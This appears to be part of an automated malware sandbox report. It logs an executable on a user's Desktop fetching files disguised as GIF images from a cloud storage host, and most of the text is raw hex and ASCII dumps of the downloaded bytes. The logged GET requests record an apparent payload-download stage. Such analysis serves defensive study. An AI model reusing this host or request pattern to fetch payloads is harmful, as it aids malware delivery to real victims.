                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                                                                Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                                                                Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                                                                Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                                                                Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                                                                Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                                                                Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                                                2025-01-10 01:26:22 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                                                                Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.54970839.103.20.424435676C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:26:24 UTC111OUTGET /c.gif HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:26:24 UTC545INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:26:24 GMT
                                                                                Content-Type: image/gif
                                                                                Content-Length: 10681
                                                                                Connection: close
                                                                                x-oss-request-id: 6780774034D7B33734D00304
                                                                                Accept-Ranges: bytes
                                                                                ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                                                Last-Modified: Thu, 09 Jan 2025 09:43:14 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 10287299869673359293
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000104
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                                                x-oss-server-time: 2
                                                                                2025-01-10 01:26:24 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                2025-01-10 01:26:24 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                                                                Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                                                                                2025-01-10 01:26:24 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                                                                Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.54971339.103.20.424435676C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:26:26 UTC111OUTGET /d.gif HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:26:26 UTC547INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:26:26 GMT
                                                                                Content-Type: image/gif
                                                                                Content-Length: 3892010
                                                                                Connection: close
                                                                                x-oss-request-id: 678077429932F135358DEE31
                                                                                Accept-Ranges: bytes
                                                                                ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                                                Last-Modified: Thu, 09 Jan 2025 09:43:23 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 3363616613234190325
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000104
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                                                x-oss-server-time: 52
                                                                                2025-01-10 01:26:26 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                                Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                                Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                                                Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                                                Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                                                Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                                                Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                                                Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
